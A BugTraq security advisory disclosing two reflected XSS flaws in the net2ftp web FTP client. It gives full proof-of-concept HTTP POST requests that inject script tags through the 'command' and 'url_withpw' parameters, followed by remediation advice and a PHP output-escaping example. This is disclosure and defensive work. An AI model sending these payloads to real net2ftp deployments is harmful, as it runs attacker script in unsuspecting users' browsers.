BugTraq
[0day] net2ftp multiple XSS on unauthenticated users Aug 05 2016 02:19AM
Jacobo Avariento (jacobo sofistic com)
*Summary*

Subject: net2ftp XSS in "command" and "url_withpw" parameters

Versions vulnerable: ALL (Tested on latest, version 1.0)

Category: 0-day

Impact: Medium

*Description of the product*

net2ftp is a web based FTP client (http://www.net2ftp.com/index.php). It can be used as a standalone version and also integrated in some web platforms, such as ISP providers, e-commerce sites and other websites.

*Description of the vulnerabilities*

During vulnerability research on net2ftp (latest version, 1.0), Jacobo Avariento found several cross-site scripting (XSS) issues: in _skins/shinra/bookmark1.template.php_ (line 18) through the "url_withpw" parameter, and in _skins/shinra/raw1.template.php_ (line 5) through the "command" parameter.

The first, in the "url_withpw" parameter, is triggered when the user places a bookmark on that FTP connection.

The second, in the "command" parameter, is triggered when the user accesses the FTP interactive mode for sending arbitrary FTP commands to the server.

*Proof of concept*

--- Parameter "command" ---

POST /net2ftp_v1.0/files_to_upload/index.php HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.php
Cookie: net2ftpcookie_ftpserver=192.168.1.103; net2ftpcookie_ftpserverport=21; net2ftpcookie_username=anonymous; net2ftpcookie_language=en; net2ftpcookie_skin=shinra; net2ftpcookie_ftpmode=automatic; net2ftpcookie_passivemode=no; net2ftpcookie_protocol=FTP; net2ftpcookie_viewmode=list; net2ftpcookie_directory=%2F; PHPSESSID=HNM7kDAFz3Gpi%2CCUYHlUEt5nlmf
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 391

ftpserver=192.168.1.103&ftpserverport=21&username=anonymous&language=en&
skin=shinra&ftpmode=automatic&passivemode=no&protocol=FTP&viewmode=list&
sort=&sortorder=&state=raw&state2=main&directory=%2F&screen=&*command=*C
WD+%0D%0APWD%0D%0A*%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22Sofistic%22%2
9%3B%3C%2Fscript%3E*&text=501+Invalid+number+of+arguments%0D%0A257+%22%2
F%22+is+the+current+directory%0D%0A

----------------------------------------

--- Parameter "url_withpw" ---

POST /net2ftp_v1.0/files_to_upload/index.php HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.php
Cookie: net2ftpcookie_ftpserver=192.168.1.103; net2ftpcookie_ftpserverport=21; net2ftpcookie_username=anonymous; net2ftpcookie_language=en; net2ftpcookie_skin=shinra; net2ftpcookie_ftpmode=automatic; net2ftpcookie_passivemode=no; net2ftpcookie_protocol=FTP; net2ftpcookie_viewmode=list; net2ftpcookie_directory=%2F; PHPSESSID=HNM7kDAFz3Gpi%2CCUYHlUEt5nlmf
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1141

ftpserver=192.168.1.103&ftpserverport=21&username=anonymous&language=en&
skin=shinra&ftpmode=automatic&passivemode=no&protocol=FTP&viewmode=list&
sort=&sortorder=&state=bookmark&state2=main&directory=%2F&*url_withpw=*%
2Fnet2ftp_v1.0%2Ffiles_to_upload%2Findex.php%3Fftpserver%3D192.168.1.103
%26amp%3Bftpserverport%3D21%26amp%3Busername%3Danonymous%26amp%3Bpasswor
d_encrypted%3D%26amp%3Blanguage%3Den%26amp%3Bskin%3Dshinra%26amp%3Bftpmo
de%3Dautomatic%26amp%3Bpassivemode%3Dno%26amp%3Bprotocol%3DFTP%26amp%3Bv
iewmode%3Dlist%26amp%3Bsort%3D%26amp%3Bsortorder%3D%26amp%3Bstate%3Draw%
26amp%3Bstate2%3Dmain%26amp%3Bdirectory%3D%252F%26amp%3Bentry%3D*%22%3C%
2Fa%3E%3Cscript%3Ealert%28%22Sofistic%22%29%3B%3C%2Fscript%3E*&url_witho
utpw=%2Fnet2ftp_v1.0%2Ffiles_to_upload%2Findex.php%3Fftpserver%3D192.168
.1.103%26amp%3Bftpserverport%3D21%26amp%3Busername%3Danonymous%26amp%3Bl
anguage%3Den%26amp%3Bskin%3Dshinra%26amp%3Bftpmode%3Dautomatic%26amp%3Bp
assivemode%3Dno%26amp%3Bprotocol%3DFTP%26amp%3Bviewmode%3Dlist%26amp%3Bs
ort%3D%26amp%3Bsortorder%3D%26amp%3Bstate%3Dlogin_small%26amp%3Bstate2%3
Dbookmark%26amp%3Bgo_to_state%3Draw%26amp%3Bgo_to_state2%3Dmain%26amp%3B
directory%3D%252F%26amp%3Bentry%3D&text=net2ftp+192.168.1.103

----------------------------------------

*Impact*

Due to a possible lack of validation of cookie and session parameters, it is possible to trigger the attacks directly, without needing to log in to the server or the website.

Because of these circumstances, the risk of the vulnerability is tagged as "medium", as there is no authentication and it can be triggered in any net2ftp software online. It has been proved that several ISP providers use this software for their clients, among other customers.

*Timeline*

Jul 24/2016: The vendor was contacted; no reply as of the date of public disclosure.

*Actions*

We recommend all sysadmins and web developers who are using net2ftp software to review the files _skins/shinra/bookmark1.template.php_ and _skins/shinra/raw1.template.php_ manually, and patch the XSS because no official patches are released or planned yet.
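
One way to apply the manual patch recommended above, as an added example that is not net2ftp's code nor part of the original advisory. The markup, attribute names and helper functions are hypothetical stand-ins; the two output contexts (a textarea for "command", a quoted href for "url_withpw") are inferred from the PoC payloads, and the sample inputs are constructed from the decoded PoC values.

```php
<?php
declare(strict_types=1);

// Added example, not net2ftp source. Hypothetical helpers showing
// context-aware output encoding for the two reported parameters.

/** Escape a value for HTML text or a quoted attribute value. */
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Prepare a bookmark URL for an href attribute.
 * The PoC shows the client sending "&amp;" separators, so decode entities
 * first, validate the real value, then encode exactly once.
 */
function esc_href(string $url): string
{
    $decoded = html_entity_decode($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // Accept only same-site absolute paths: "/..." but not "//host" or
    // "/\host", and no control characters. Anything else becomes inert.
    if (!preg_match('#^/(?![/\\\\])[^\x00-\x1F\x7F]*\z#', $decoded)) {
        return '#';
    }
    return esc_html($decoded);
}

/** Hypothetical stand-in for the raw1 template output ("command"). */
function render_raw_textarea(string $command): string
{
    return '<textarea name="command">' . esc_html($command) . '</textarea>';
}

/** Hypothetical stand-in for the bookmark1 template output ("url_withpw"). */
function render_bookmark_link(string $urlWithPw, string $text): string
{
    return '<a href="' . esc_href($urlWithPw) . '">' . esc_html($text) . '</a>';
}

// Constructed inputs mirroring the decoded PoC parameter values.
$command = "CWD \r\nPWD\r\n</textarea><script>alert(\"Sofistic\");</script>";
$url = '/net2ftp_v1.0/files_to_upload/index.php?ftpserver=192.168.1.103'
     . '&amp;entry="</a><script>alert("Sofistic");</script>';

$cases = [
    'raw1 unescaped'    => '<textarea name="command">' . $command . '</textarea>',
    'raw1 escaped'      => render_raw_textarea($command),
    'bookmark1 escaped' => render_bookmark_link($url, 'net2ftp 192.168.1.103'),
];

foreach ($cases as $label => $html) {
    // A literal "<script" in the rendered markup means the value broke
    // out of its context; after escaping it appears only as "&lt;script".
    $survives = stripos($html, '<script') !== false ? 'yes' : 'no';
    printf("%-18s script tag survives: %s\n", $label, $survives);
}
```

Escaping with the default double-encoding on a value that already carries "&amp;" would corrupt the bookmark link, which is why the href helper decodes before validating and encodes once at output.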

*Contact*

Jacobo Avariento

Jacobo -*- sofistic -*- com

-----------------------------------------------
Jacobo Avariento
Cybersecurity Consultant / Pentester

Sofistic S.A., Panama City

